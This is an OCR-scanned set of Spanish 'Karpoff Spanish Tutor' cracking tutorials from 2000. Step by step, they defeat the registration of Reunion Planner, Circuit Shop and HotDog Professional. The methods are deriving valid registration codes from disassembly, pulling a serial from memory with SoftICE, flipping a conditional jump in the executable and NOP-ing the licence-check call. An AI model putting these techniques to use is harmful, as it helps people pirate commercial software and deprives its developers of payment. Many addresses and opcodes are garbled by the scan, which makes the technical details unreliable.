:0042E5B8 7415 je 0042E5CF 

:0042E5BA 3C30 cmp al, 30 

:0042E5BC 7C11 j¡10042E5CF 

:0042E5BE 3C39 cmp al, 39 

:0042E5C0 7FOD jg 0042E5CF 

:0042E5C2 OFBECO movsx eax, al 

:0042E5C5 8D0OC89 lea ecx, dword ptr [ecx+4*ecx] 
:0042E5C8 42 inc edx 

:0042E5C9 8D4C48D0 lea ecx, dword ptr [eax+2*ecx-30] 
:0042E5CD EBE5 ¡mp 0042E5B4 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0042E5B8(C), :0042E5BC(C), :0042E5C0(C) 


| 
:0042E5CF 69FFAOCEO100 imul edi, OOO1CEAO 


:0042E5D5 3BF9 cmp edi, ecx 
:0042E5D7 7422 je 0042E5FB 


Ahora sabemos que el número es válido y llegará un momento en que el salto 
:0042E5AA 7549 ¡ne 0042E5F5 
no se produzca. En mi caso, cuando EDI valga 2222 (que es el número que escogí entre 


1001 y 5000). Por tanto llegará un momento en que se ejecutará la línea 

:0042E5AC 8D95ECFDFFFF lea edx, dword ptr [ebp+FFFFFDEC] 

que es la siguiente, así que si no queremos pulsar F10 tropecientasmil veces hasta que EDI 
valga 2222 (o el valor que vosotros hayais escogido), podemos borra nuestro breakpoints y 
pones uno en esa línea, es decir bpx 42E5AC. Ahora sólo tenemos que pulsar FS y ya 
estamos allí. 


Ánimo, que esto se acaba :). Si os fijais en lo que viene ahora, vereis que se vuelve a 
repetir una vez más la comprobación de siempre (y ya es la cuarta vez), y mientras se va 
guardando el Reg. Code 2 en ECX. Una vez Hecho esto, se multiplica EDI (que ahora vale 
2222 o bien el número que vosotros hayais escogido) por ICEAO (que en decimal es 
118432, para verlo basta escribir ?1CEAO), y se compara con ECX, que es nuestro code 2, 
en mi caso 444444444, y si son iguales salta al mensaje de "Thank you for Registering", 
pero si no lo son, como en este caso, vuelve a poner el dichoso mensaje de error. 


Bueno, supongo que ya está claro lo que hay que hacer ¿no?. Basta que el Registration 
Code 2 sea el producto de 118432 por el número que hayamos escogido entre 1001 y 5000 
para calcular el Registration Code 1. En mi caso: 

- Escojo el número 2222 (1001<2222<5000) 
- 2222 X 318461 = 707620342 
- 2222 X 118432 = 263155904 


- Por último introduzco mis datos en el programa: 
Your name: <KeKo> 

Registration Code 1: 707620342 

Registration Code 2: 263155904 


le doy a OK y... ¡FUNCIONAAAAAAA! 


Si vamos a Help-About vemos "Registered to <KeKo>" (o el nombre que vosotros hayais 
puesto), y si cerramos y volvemos a abrir, seguimos registrados. Por fin, programa 
crackeado. 


Bueno, quisiera decir que este tutorial me ha quedado muy extenso y pude que pesado, 
pero comprended que es el primero. Espero ir mejorando con el tiempo. Se aceptan dudas y 
sugerencias en: kekosoftO yahoo.com . 


Quisiera darle las gracias a Karpoff por su labor. Aunque no lo conozco, fué gracias a su 
página y sus tutoriales por lo que empecé a interesarme por esto de la Ingeniería Inversa, y 
la verdad es que cada día me gusta más :) . 


Un saludo a todos los que hayais tenido la paciencia y el valor para haberos leido este 
tostón entero. Si me mandais vuestra dirección os enviaré una aspirina para el dolor de 
cabeza ;)) Hasta pronto. 


Programa: 


Karpoff Spanish Tutor 


Reunion Planner v4." 


Unlock Code (Serial). Sólo te permite 10 entradas sino estás 
PROTECCION: : 
registrado. 
Descripcion: Planificador de citas, reuniones, etc. 
Dificultad: Principiante+ 
DOWNLOAD : http://www.minutiaesoftware.com/ 
Herramientas: Softice v3.xx 
CRACKER: LEiRUS FECHA: 22/08/2000 


INTRODUCCION 


Empezaremos como siempre, analizando un poco el comportamiento del programa en 


situaciones límites. Nada más ejecutarlo, nos dice que una ventanita que no es la versión 
registrada, y que por tanto, no vamos a poder poner nada más que 10 entradas en el 
programa. Nos pregunta si queremos registrarnos. Le damos a que sí y aparecemos en un 
formulario para que introduzcamos los datos personales, y una caja de texto donde pone 
"Demo" y un botoncillo gracioso donde pone "Enter". Bueno, ya sabemos que podemos 
meter un serial. Más tarde iremos en su busca. 


Ninguna de las utilidades analizadoras que utilizo (Filel nfo, FileScanner, FileAnalyzer), me 
detecta el lenguaje en que ha sido escrito el programa. No importa, vamos a atacar 
directamente con el SiCE y vamos a utilizar un método NO recomendado en la mayoría de 
los casos aunque en realidad funciona en muchos programas. 


Bueno, al quid de la cuestión que es lo que nos ha traído aquí. 


AL ATAKE 


MÉTODO UN TANTO "CAPULLÍN" PERO QUE FUNCIONA: 


Como dije anteriormente, vamos a explicar un método de trabajo que NO recomendaría que hiciese 
nadie, pues es un poco "lamer". El método en cuestión consiste básicamente en meter un serial en 
el programa y antes de dar al botoncillo, poner un BPX en lo típico (hmemcpy, getdlgitemtexta, 
getwindowtexta, messageboxa, etc) y esperar a que salte. Una vez hecho esto, tan sólo nos queda 
buscar datos que hayamos metido, tales como nuestro nombre, números no válidos, etc. Después, 
moviéndonos por la ventana de datos, podemos buscar cosas que "sospechosas". Es posible que el 
serial que buscamos esté en posiciones de memoria contiguas. 


Esto es un hecho empíricamente comprobado, es decir, que no es una ley. Además, sólo sirve para 
algunos programas. 


Explicar el porqué de esta "predisposición" de los programadores es sencillo. Éstos, al comparar dos 
Cadenas, que son representadas como nuestro serial y el que ha generado el ordenador, serán 
pasadas como argumentos de una función, por lo que lo lógico será que se almacenen en posiciones 
de memoria adyacentes, con el único fin de ahorrar trabajo al programador en el proceso de 
depuración. 


Existen multitud de programas que se basan en esta ¿¿¿¿protección????, aunque debido al 


conocimiento y al auge al que han llegado las técnicas de cracking, cada vez quedan menos 
programas así de facilones. 


Una vez explicado esto, pasamos pues a atacar al susodicho. 


CON "'S" DE SiCE: 


El turno de SiCE, como siempre. Tareas requeridas: arrancar el SiCE de una vez, que se te congelan 
las pelotas, vamos chavalín. 


Rulamos el ReunionPlanner. Bien, nos vamos a la "zona serial". Ponemos uno falso, el primero que 
se nos pase por la mente. Yo pongo mi número favorito "147258369". Antes de darle a "Enter", 
debemos entrar en SiCE y poner los BPX que antes hemos dicho. 

Lo más probable es que te salten 108.000 veces por lo menos, pero tras 6 ó 7 veces de darle a 
Ctrl +D, vamos a utilizar el comando "S", Search in Memory o Buscar en Memoria del SiCE. Este 
comando busca por el espacio de memoria virtual de 4Gb en busca de la cadena especificada. Su 
sintaxis es la siguiente: 

S [-cul [address L length data- list] 


Para más información, acude al genial TUT de BlackFénix acerca de SiCE, con todo su "espectro" 
comentado. 


El ejemplo y la orden que utilizaremos normalmente será la siguiente: 


S 30:00 L ff "cadena' (cadena normalmente representará nuestro nombre -LE¡RUS-, o 
nuestro serial introducido -147258369-) 


Si se encuentra un dato, será mostrado en la ventada de datos. Para seguir con la siguiente 


coincidencia, basta con pulsar la tecla "S" y presionar Enter. 


NOS ENCONTRAMOS CON UNA SORPRESITA: 


Tras hacer lo que he dicho anteriormente, nos encontraremos con el serial que válido, que tendrá la 
forma: RPxxxxx en "condecoración" al nombre del programa, ReunionPlanner. 


CONSIDERACIONES FINALES: 


Desde luego, no se puede dejar a un programador con una mente comercial trabajar, porque sino, 


Realmente da asco a veces la cantidad de mierda de la que suelen estar rodeados estos satanás del 
Marketing, que por unas pesetas venden su pobre y despojada mente de ideas contemporáneas. 


Bueno, después de todo esta sarta de paranoias y estupideces varias, sólo resta despedirme, como 
es normal en mis escritos. 


AGRADECIMIENTOS: 


Siempre que escriba un tutorial, y lo digo para futuros TUT"s, voy a agradecer el apoyo recibido por 
los componentes de [K-FoR], un grupo, aún en fase de definición, pero que esperamos que salga 
adelante de una manera un poco más serio de lo que está siendo ahora. 


Por lo tanto, debo saludar a RAZI¡EL y ViPER por sus aportaciones "culturales" a todo esto del 
cracking. Por cierto, a ver si se RAZ¡EL a escribir algún TUT para newbies o para lo que sea. Animo 
también a ViPER a que mande los TUT's a quien puedas, como a Profesor_X. Agradezco con gran 
énfasis a Karpoff, por su gran página y por brindarme la oportunidad de aparecer en la misma. Por 
supuesto que también voy a darte las gracias a tí, genial Profesor_X, que me has insertado en tu 
compilación, aunque sea con un nombre un tanto modificado. 


A todos, muchas gracias. 


"CRACKEO, LUEGO SOY LIBRE" 


Programa: 


Karpoff Spanish Tutor 


Circuit Shop vl1.09 


PROTECCION: Serial Number. Shareware de 30 dias con varias funciones deshabilitadas. 

Descripcion: Programa para el diseño de circuitos analógicos y digitales. 

Dificultad: PR 
DOWNLOAD: http://ourworld.compuserve.com/homepages/Cherrywood/ 

Herramientas: Soto 13.24 y cual ue O RR 
CRACKER: 


Arkanian FECHA: 25/08/2000 


INTRODUCCION 


Bueno, he hecho esto por proporcionar un enfoque distinto a los procedimientos habituales del bpx 
Get'"'loquesea'' o de buscar el mensaje del "Registro no válido' o similar en el W32dsm89 y de ahí tirar 


hacia atrás. 


De todas formas vamos a conseguir lo mismo empezando por el principio, quizas con un poco más de trabajo, 
pero el resultado será de lo más satisfactorio. Además el programa es una "perita en dulce" que no se puede 
dejar pasar así como así. Cosas sencillas como esta ya no se encuentran. 


Vamos a utilizar el Sice (Soft CE) con una configuración básica del winice.dat que se puede bajar de aquí. 
Ya cambiarás la configuración del winice.dat "a mano" cuando le vayas pillando el truco a todo esto. De 
momento creo que es suficiente con esto. 


e Sino quieres perder tu configuración actual, renombra el winice.dat que tienes en el directorio del 
SofICE por winice.old (por ejemplo) y copia el winice.dat nuevo (ya descomprimido) al mismo 
directorio. Para volver a la configuración anterior haz a la inversa. 


VISTAZO PRELIMINAR 


Iniciamos el programa y aparte de la ventana principal vemos que se despliegan también tres barras de herramientas 
diversas a la derecha de la pantalla y otra ventana central que es la que nos indica que es una versión sin registrar del 
producto, el copyright, etc... 


Esta ventana es de lo más mosqueante. El tipo de letra, el fondo blanco, los botones, vamos, el formato en general me 
recuerdan al Windows 3.1 y eso que en el copyright pone claramente 1997-2000. En fin, ya veremos... 


Bueno le decimos que OK, que sí, que ya sabemos que estamos "Unregistered", se cierra la ventana y luego cerramos 
las tres barras de herramientas para que no molesten. Vamos arriba a File y luego a Register, ...más mosqueo, ¿la 
ventana de registro es una ventana típica del Win 3.17. Esto tiene pinta de programa viejo reciclado, si tienes 
curiosidad pincha en Help y luego en Purchasing para ver cuanto pretenden cobrar por la versión completa del 
programa. 


Vamos a completar los datos que nos pide la ventana de registro, pon lo que quieras, y hacemos un Ctrl+D para saltar 
al Sice. 


AL ATAKE 


Lo primero será asignar valores a las ventanas de datos, dado que por nuestra configuración disponemos de 4 ventanas 
de datos, esto nos será util para automatizar el proceso. Así que tecleamos DEX 0 EAX y Enter, DEX 1 ES:EDI y Enter, 
DEX 2 DS:ESI y Enter, la ventana numerada como (3) yo la dejo habitualmente con el selector 30 para volcados 
puntuales, alguna busqueda, otras asignaciones, etc... Puedes pasar por las diferentes ventanas si pinchas con el ratón 
en el número entre paréntesis o en cualquier lugar de la barra de separación (arriba, donde pone byte). 


¿Y a?, pues venga, tecleando: 
:task > Veamos como se llama nuestro objetivo. 


TaskName  SS:SP  StackTop StackBot StackLow TaskDB HQueue Events 
WinWord  0000:0000 0061F000 00630000 36CE 372F 0000 


CIRC * 406F:EB96  CFCC EF36 EF36 11BE OFDF 0000 
Nuestro amigo se llama CIRC , ahora vamos a pillar las ventanas que tiene en funcionamiento: 
:hwnd CIRC 2 ¿Qué ventanas tenemos abiertas? 


WindowHandle HQueue SZ QOwner Class Name Window Procedure 


OABO (1) OFDF 16 CIRC Balloon Window  3FE7:000000DD 
ODCA (1) OFDF 16 CIRC  +t32770 (Dialog)  3E1F:000000B3 
0DC8(2) OFDF 16 CIRC Edit 3E1F:000000BA 
0DCC(2) OFDF 16 CIRC Edit 3E1F:000000AC 
0DDO(2) OFDF 32 CIRC Button 177F:00001040 
0DDA (2) OFDF 32 CIRC Button 177F:00001040 
0DD8 (2) OFDF 32 CIRC Button 177F:00001040 

es ir. O o a” data darias etc. 


Parece claro que 32770 (Dialog) en 0DCA (1) es la ventana de registro, que se compone de dos "cajas" de edición 


(0DCS8 y 0DCC Name y Key respectivamente) y los tres botones del OK, Cancel y Help. Otra cosa que observamos es 
que nuestro objetivo, CIRC, parece ser de 16 bits (Columna SZ, ya me parecía, con tanta ventana del tipo W3.1) y eso 
nos obliga a asignar las ventanas de datos de nuevo, (DEX 0 AX, DEX 1 ES:DI, DEX 2 DS:SI).. También quiero 
decir que todas las direcciones que aparecen son las relativas a mi ordenador, en el vuestro obviamente serán 
diferentes. 


Bueno vamos con el primer breakpoint, directamente al primer Edit : 


:bms g 0DC8 WM_GETTEXT 3 Break en Windows message. Esto no falla (casi) nunca. 


WM_GETTEXT 


Una aplicación envía un mensaje de WM_GETTEXT para copiar el texto que corresponde a 
una ventana en un buffer proporcionado por la llamada. 


wParam = (WPARAM) cchTextMax; // el número de caracteres a copiar 
IParam = (LPARAM) IpszText; // la dirección de buffer para el texto 


Returns 
El valor de retorno es el número de caracteres copiado. 


Fuente: CRACKER“S notes by TORNODO 


Ctrl+D, volvemos al programa, le damos al OK y saltamos de nuevo al Sice con este mensaje: 


Break due to BMSG 0DCS WM_GETTEXT (ET =110.93 milliseconds) 
HWnd = 0DCS wParam = 0064 IParam = 406FE91A msg = 000D WM_GETTEXT 


Y en esta dirección (en mi cacharro): 
4797:00DD CALL 0002 


Ahora tecleamos: 
¡stack 3 A ver que tenemos por la pila. 


CIRC (52) at 37CF:0E46 [?] 
CIRC (52) at 37CF:0CDD [?] 
CIRC (3B) at 32F7:005F [?] 


CIRC (70) at 476F:0288 [2] 
USER!GETWINDOWTEXT + 001F at 179F:1065 [?] > Esto ya es más familiar, ¿eh?. 
3 CIRC .Alloc at 4797:00DD [?] 


Lo que me asombra es la cantidad de cosas que hay en la pila, la cantidad de módulos que tiene el programita de 
marras, ¿cuántos serán?, ¿se pueden ver?, ¿vamos a verlos todos?, ¿seguro?, pues venga, tecleando: 


:heap CIRC > Veamos que anda haciendo CIRC por la memoria. 


¡¡Bueno!!, Lo que hay aquí, 136 modulos diferentes cargados en memoria, (si no he contado mal), procesar todo esto 
en el W32dsmg89 llevaría un buen rato. (Y de hecho lleva un rato largo, te lo digo yo). 


A lo que íbamos, ya que tenemos el USER!GETWINDOWTEXT que ha sido cargado después del CIRC (70), parece 
lógico, pues, suponer que proviene de ahí y que si no pasa nada volveremos ahí, (ya sabes, ¿quienes somos?, ¿de 
donde venimos?, ¿a donde vamos?), por lo que vamos a hacer un break a esa dirección (insisto, en mi cacharro): 


:bpx 476F:0288 


Hacemos un Ctrl+D y aterrizamos aquí en: 476F:0288 CALL USER!GETWINDOWTEXT, una vez aquí pulsamos F10 
para pasar a la siguiente instrucción y de ahí vamos trazando el código con F8 para ver como va meneando los bytes, 
como pilla el Name, como comprueba si el Name esta en mayúsculas o minúsculas, si tiene la longitud de caracteres 
adecuada, como va haciendo el Serial, como lo compara con el número que hemos metido, etc... 


Puedes ir viendo todo esto cambiando por las diferentes ventanas de datos. Hasta que llegamos aquí: 


:62AF XOR AL, AL 
:62B1 REPNZ SCASB 3 Esto va pillando ES:DI hasta CX=0. 
:62B3 SUB BX, CX 
:62B5 MOV CX,BX 


:62B7 MOV DI, SI 3 Offset del Serial bueno a DI. 
:62B9 LDS — SL [BP+06] 3 Offset del mio en SL 
:62BC REPZ CMPSB 3 Compara DS:SI con ES:DI, serial malo con el bueno. 


:62BE MOV AL, [SI-01] 3 Carga en AL el 1er. caracter diferente de mi serial. 
:62C1 MOV BL,ES:[DI-01] 3 Carga en BL el 1er. caracter diferente del bueno. 


:62D1 RET 3 Trazando hasta aquí. 
:048C ADD  SP,0A 3 Aparecemos aquí. 

048F OR AX, AX 
:0491 JNZ  049F > ¡BINGO!, detente aquí. 


Bueno, pues esto es casi todo, ahora vamos con el ratón y ponemos el cursor encima de la dirección del salto anterior, 
le damos al botón derecho y en el menú que sale elegimos Display (es lo mismo que hacer D EIP), en la ventana de 
datos (en hexadecimal) nos aparece un 75 OC en las dos primeras posiciones. 


Muy bien, ahora apuntamos en un papel el valor de varios bytes más (75 0C B8 01 00 8D 66 FE) y vamos a probar, 
pinchamos con el ratón en el 75 y lo cambiamos por un 74, (un JNZ por un JZ), le damos al Enter, vamos a la ventana 
de comando, ahora deshabilitamos los breakpoints (BD *), así, si esto no funciona y hay que volver a empezar, basta 
con habilitarlos de nuevo con BE *, de esta forma no hay que volver a teclear los bp's otra vez. 


Salimos al programa con Ctrl+D y comprobamos el cambio. 


Perfecto, está registrado y todas las funciones habilitadas (esta versión shareware entre otras pirulas no deja imprimir, 
¡vaya morro!). Volvemos al Sice con Ctrl+D y, ahora sí, limpiamos todos los bps con BC *. 


Hacemos el último Ctrl+D para volver a Windows, cerramos todo, vamos al editor de hexadecimal, abrimos el archivo 
CIRC.EXE, buscamos la secuencia de arriba, comprobamos que sea única (apunta algún valor más por si acaso), 
cambiamos el 75 por un 74, guardamos y salimos. 


Arqueología Informática 


Como habrás podido comprobar, TODOS los archivos .EXE comienzan por MZ. 


Estas son las iniciales de Mark Zibikowski, uno de los arquitectos y padre del 
DOS. ¡Lo que ha llovido desde entonces! 


Abrimos el Circuit Shop v1.09, nos registramos adecuadamente, es decir, pones cualquier cosa y a funcionar. El 
programa siempre va a darte por válido pongas lo que pongas. Eso si. el día que aciertes con la contraseña buena sera 
cuando aparezca el mensaje de error. 


Esta es una manera de hacerlo, seguro que hay bastantes más, solo es cuestión de dedicarle un rato. 
Tu mismo... 


¿Como?, ¿Que vuelves a entrar en el programa y te dice que no estás registrado?. Claro, hay un segundo chequeo 
cuando se inicia el programa que mira en el archivo de registro y compara el Serial bueno con el que hay ahí. Busca en 
el directorio del Circuit Shop un archivo con extensión .reg y veras almacenados tus datos. 


Tienes dos opciones, o buscar el Serial bueno (has pasado por encima cuando trazabamos el código), o buscar donde 
se hace el chequeo e intentar saltarlo. 


Descubrir como se hace es cosa tuya, yo solo te he enseñado el camino. ¡Suerte!, no es tan dificil como parece. 


Karpoff Spanish Tutor 


Programa: HotDog Professional 6.0 


PROTECCION: Limitacion de 30 días. 

Descripcion: Editor de texto para programadores de páginas Web. 
Dificultad: Principiante 

DOWNLOAD: http: //www.sausage.com (Cd-Actual n*47) 

Herramientas: M32dasm 8.93, Editor Hexadecimal, Softice 

CRACKER: KuaTo_ThoR FECHA: 31/08/2000 


INTRODUCCION 


Bueno aquí estamos de nuevo amigos, preparados para una nueva batalla. 


Creo que en este programa podremos encontrar alguna cosa curiosa, al menos es distinto a los que he podido 
ver últimamente. Nuestro objetivo será aparentar estar registrados, eliminando la limitación temporal. 


En programas con limitaciones temporales o limitaciones en el número de veces de uso lo mejor antes de 
ejecutar por primera vez el programa es poner en marcha un programa "espía", para ver donde guarda datos 
tan interesantes como: día de la primera ejecución, número de veces ejecutado, fin de la prueba, que con sólo 
borrarlos, volveremos a estar en el primer día de la prueba o incluso podremos registrarnos directamente. 
Podemos usar Filemon, Regmon y algunos otros. En este tutorial, voy a utilizar el TechFact95/98, que tomará 
una fotografía del sistema, ejecutará el programa, y luego tomará una segunda fotografía, las compara y nos 
informa de todos los cambios realizados por el programa durante su ejecución. No voy a explicar como se 
utiliza, para ello os remito al magnífico tutorial del bueno de Karpoff, que tiene en su página, en la sección 
"Trabajos Realizados con otras Herramientas" creo que trataba sobre el MemTurbo (un tutorial muy 
interesante). 


AL ATAKE 


Preliminares. Obtener información. 


Este paso es esencial, saber que nos va a pedir el programa, ver como actua, son datos que nos van a ayudar en nuestra 
labor. 


Por primera vez ejecutamos el programa usando TechFact95/98, y entre los cambios más interesantes eu realiza el 
programa se encuentra la creación de la siguiente ruta en el registro: 
[HKEY_LOCAL_MACHINE Software WMicrosoftiShared ToolsiPRV6], esta será la localización de nuestros datos 
temporales (fecha de inicio y fecha final de ejecución), con sólo borrar esta carpeta, volveremos al primer dia de uso. 
(en este tutorial no nos servirá para mucho, pero es una buena costumbre buscar este tipo de datos). 


Más cosas, como siempre ejecutamos el programa, y nos salta una ventanita con varias opciones, además aparece el 
dia que va a caducar nuestro programa. Continuar el trial, registrarse por internet, incluso podemos meter una clave de 
registro, vamos a ver que nos pide... 


Nota: ¿son mis ojos, o el perro es horrible? ; ) 


El nombre, una dirección de correo electrónico (sin estos datos no podremos dar al OK), y luego un código que 
comienza por RK, y un identificador que empieza por ID. Rellenamos todo con lo que más nos guste, damos al OK y 
esperamos a ver ... nos aparece ''Sorry...'' comprate el programa. 


Ya sabemos algo, continuamos con la carga del programa, miramos en la ayuda buscando algo que pudiera ser 
interesante, algún tipo de limitación, pero no hay nada. Lo único es que aparece un menú llamado "Buy HotDog", 
donde podemos registrarnos nuevamente, adquirir el programa, etc. Desde luego, este menú tiene toda la pinta de 
desaparecer en la versión registrada. 


Vamos en busca de más datos que nos puedan evitar pasar un mal rato, como por ejemplo que se nos quede colgado el 
Wdasm al intentar abrir el ejecutable por estar comprimido. Para ello podemos utilizar el GetTyp, el File Analizer y 
algunos otros. Yo voy a utilizar el GetTyp; metemos el ejecutable, y nos dice un par de cosas interesantes, la primera 
que no está comprimido, y la segunda que está compilado en Delphi. 


A por el 'mensaje' de error 


Bien, ya tenemos bastantes datos, ya sabemos que salvo que tenga una protección contra desemsamblado, no 
tendremos problemas para abrilo en el Wdasm. Pues vamos a por él (fijaos en el tamaño del archivo, 5.590 kb), 
hacemos una copia de seguridad de nuestro archivo (HotDog6.exe), la abrimos con Wdasm, y después de unos 15620 
minutos (tengo un K6-2 a 400), podremos mirar a ver que se cuece por ahí. 


Lo primero es GUARDAR el proyecto (no lo olvidéis). Ahora buscamos nuestra frase en las "String References", o 
directamente en buscar texto, pero no aparece por ninguna parte, ni tampoco aparece algo como, 'Thanks', o 
'Congratulations'. ¿ Y que hacemos ahora? Lo que yo he pensado ha sido ir a Softice, introducir los datos, meter un 
break hmemcpy y ver donde aterrizamos. (quizás alguien se haya dado cuenta de alguna frasecilla que yo pasé por alto, 
pero que finalmente será de gran utilidad, de todas formas he preferido no saltarme ningún paso de los que 
inicialmente hice, no siempre se alcanza el éxito a la primera ; ). 


Cambio de planes. 


Lo dicho, ejecutamos el programa, introducimos los datos del registro, vamos al Softice con Ctrl+D, metemos bpx 
hmemcpy (conviene tener todos los demás programas cerrados para evitar que salte un programa que no nos interesa), 
volvemos al HotDog, le damos al OK y ... estamos en Softice, pulsamos F12 hasta que veamos nuestro programa, F12, 
F12, F12, pasamos por unos cuantos User, y de repente, nos aparece Sausreg!, pero ¿qué es esto? ¿no será una dll o 
algo así que nuestro programa llama para realizar la comprobación del registro? ;-) 


Nos salimos del Softice, cerramos el programa, y buscamos en nuestro disco duro Sausreg, y nos aparece, al menos a 
mi, en CAWindowsiSystemiSausreg.exe. No es una dll, es otro ejecutable. Podemos hacer nuevamente los pasos que 
he realizado antes con el ejecutable principal, y si queremos podemos desemsamblarlo para ver que frasecitas hay por 


ahí. Pero se me han ocurrido un par de cosas que pueden ser interesantes, si encontramos en el ejecutable principal 
donde hace la llamada al otro, ¿podremos saltarnos esa llamada?, ¿podremos modificar el valor de salida de esa 
llamada?, ¿podremos algún día saber a que huele lo que no huele? ; ) 


Intentaremos buscar respuesta a algunas de estas preguntas. Para encontrar la llamada tenía pensado intentar entrar con 
Softice y ver donde salta, pero justo en ese momento se me apareció la diosa Fortuna. Al ejecutar nuevamente el 
programa vi lo siguiente: 


Yersion 6.0 


Checking Registration Status... == 


6) 1995 - 2000 Sausage Software Sausage 


Interesante frase, 'Checking Registration Status', vamos a buscarla en el Wdasm, abrimos nuestro proyecto guardado 
antes,si ya lo habíamos cerrado y buscamos la frase...¡¡¡ Ahí está!!!, nos aparece lo siguiente: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :005C08430 (U) 

| 

:005C843C AlAZAD6FOO mov eax, dword ptr [O006FAOAS 
:005C8441 833800 cmp dword ptr [eax], 00000000 
:005C8444 7411 je 005C8457 

:005C8446 AlAZAD6FOO mov eax, dword ptr [006FAOASZ 
:005C844B 8B00 mov eax, dword ptr [leax] 


* Possible StringData Ref from Code Obj ->"Checking Registration Status..." 
:005C844D BADO865C00 mov edx, 005C86DO0 
:005C8452 E8SC97FFBFF call 00580420 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :005C8444 (C) 

| 

:005C8457 C645FE0O1 mov [ebp-02], 01 

:005C845B 8D45FE lea eax, dword ptr [ebp-02] 

:005C845E E84D7EFFFF call 005C02B0 <- Aquí se llamará a Sausreg.exe 
:005C8463 8845FF mov byte ptr [ebp-01], al 

:005C8466 807DFFOO cmp byte ptr [ebp-01], 00 

:005C846A 0F8416020000 je 005C8686 

:005C8470 AlAZAO6FOO mov eax, dword ptr [006FAOAS] 

:005C8475 833800 cmp dword ptr [eax], 00000000 

:005C8478 7411 Je 005C848B 

:005C847A AlAJAO6FOO mov eax, dword ptr [006FA0A/] 

:005C847F 8B00 mov eax, dword ptr [eax] 


* Possible StringData Ref from Code Obj ->"Initializing HotDog..." 


:005C8481 BAF8865C00 mov edx, 005C86F8 
:005C8486 E8957FFBFF call 00580420 


Después de ver esto, nos sube un poco el ánimo, ¡al fin hemos encontrado algo realmente interesante!. Como he puesto 


arriba, podemos ver que en 005C845E call 005C02BO0, se llama al archivo. Lo primero que podríamos hacer es 
nopearlo para ver que pasa. Vamos a probarlo en el Softice, vamos nuevamente a esa dirección, y antes de pasarnos, 
vamos a escribir en el Softice utilizando el comando a + dirección que sirve para introducir código en la dirección 
especificada, en nuestro caso: a 5C845E, y nos aparecerá: 


>005C845E -Zona para escribir nuestra instruccion- 


Escribimos: nop y pulsamos Enter, repetimos tantas veces como nops hagan falta, en este caso 5 veces, (lo que 
hacemos es lo siguiente: ES4D7EFFFF ponemos 9090909090) para salir finalmente de la edición pulsamos Enter una 
vez más. Una vez acabado pulsamos FS para dejar correr el programa, y ¡¡¡SORPRESA!!!, el programa arranca sin 
problemas y no aparece la ventana, aunque en el programa nos sigue apareciendo el menú 'Buy HotDog'. Desde luego 
al haber eliminado la llamada al programa Sausreg.exe, ya no hay limitación en el tiempo, probadlo por si las moscas, 
adelantad el reloj un par de meses. Si nuestro objetivo fuese disfrutar del progrma por la cara, el objetivo estaría 
cumplido, pero nuestro objetivo va más allá, hay que eliminar el menú 'Buy HotDog'. 


Lo que se me ocurre es seguir esta llamada, hasta el lugar exacto donde llama a Sausreg.exe, y ver con que volvemos 
de la llamada dependiendo de la opción que seleccionemos. Para poder hacerlo utilizamos el Symbol Loader, cargamos 
el archivo (hotdog6.exe), y cuando estemos en el Softice, metemos un bpx 005C845E, y pulsamos FS. Aparecemos 
otra vez en Softice, justo en nuestra llamada, entramos dentro con F8, seguimos traceando con F10, hasta que llegamos 
a: 


:005C05C9 50 push eax 

:005C05CA 8B00 mov eax, dword ptr [eax] 

:005C05CC FF5040 call [eax+40] <-Aquí vamos a Sausreg.exe 
:005C05CF E8E460E4FF call 004066B8 

:005C05D4 8B45E8 mov eax, dword ptr [ebp-18] 

:005C05D7 33D2 xor edx, edx 

:005C05D9 E86641E4FF call 00404744 <- Cancel=>Eax=0; Try => Eax=A 
:005C05DE 740F Je 005C05EF <- Eax=0=> Salta; Eax<>0 => Seguimos 
:005C05E0 8B45E8 mov eax, dword ptr [ebp-18] 

:005C05E3 BAO40A5COO mov edx, 005C0A04 

:005C05E8 E85741E4FF call 00404744 

:005C05ED 7504 jne 005C05F3 


Antes de dar a F10 sobre 005C05CC, ponemos un break justo en la siguiente instrucción, bpx 5C05CF, para que no 
se nos vaya Softice sin ver que ha salido de ahí. Si cuando aparece la ventana de registro damos a Cancel al llegar a 
005C05D9, eax valdrá cero, entonces saltaremos evitando un trozo de código, por donde si hubiesemos pulsado Try, 
hubiesemos pasado. Esto nos dice que si saltamos nos vamos del programa, y si no no. Probad a dar Cancel y al llegar 
al salto invertirle, por ejemplo con R FL Z, ejecutará el programa sin más. (Incluso he llegado a 'caducar' el programa, 
y sólo con invertir ese salto, vuelve a arrancar). 


¿Qué podemos hacer ahora? Podemos volver a nopear esta llamada al archivo, si lo hacemos con softice, con a 
5C05CC y metemos nuevamente nop, esta vez sólo tres veces, veremos como el programa se cierra, como cuando 
pulsamos Cancel, por tanto se me ocurrió, además de nopear la llamada, nopear el salto 005CO5DE 740F je 
005C05EF, cambiando 740F, por 9090. Lo probamos y ... 


¡¡Arranca el Programa!! y además desapareció el menú 'Buy HotDog”. 


Estos cambios se pueden hacer permanentes, mediante nuestro editor hexa favorito. Mirando los offset de las 
direcciones en el Wdasm, o en el magnífico KrackPE de nu MI T_or 


Consideraciones finales. 


¿Qué ha pasado? Desde mi humilde punto de vista, el programador hace la llamada, si salimos sin pulsar Cancel, pone 
en algún lugar un número concreto llamémosle 'X', ya sea O, 1 Ó cualquier otro. Una vez fuera de la llamada, ya en el 
código del ejecutable principal, al pasar por el primer jump sin saltar evitamos irnos fuera del programa, y más 
adelante mira ese valor 'X', si es el de no registrado, deja o pone el menú 'Buy HotDog! y si es distinto, el menú no 
aparece por ninguna parte (también podría ser fruto de la casualidad, quién sabe ;-). Y como no hay más 


comprobaciones en el resto del programa esta protección cae por si sola, nos lo han puesto demasiado fácil. 


El principal error, para mi, ha sido crear un segundo ejecutable de casi 1 MB para luego consulatarla para comprobar si 
estamos registrados en un sólo punto del programa, y sin dificultarnos la opción de nopear la llamada a dicho archivo 
desde el principal. A parte de esto, ese mensaje al inicio del programa 'Comprobando el estado de Registro", 
indicándonos donde estaba la zona caliente, facilitándonos mucho el trabajo. 


Bueno, esto ha sido todo por esta vez, espero que este texto os haya servido de ayuda, y que sepáis disculpar los 
posibles errores que haya cometido en él. 


Karpoff Spanish Tutor 


Programa: PRODUCTOS MACROMEDIA € SALES AGENT 


PROTECCIÓN: Sales Agent 3.1.X. Impresentable intento de limitación a 30 días. 


Descripción: | Hallar TODOS los códigos necesarios para REGISTRAR los programas. 


Dificultad: Aficionadillo. 


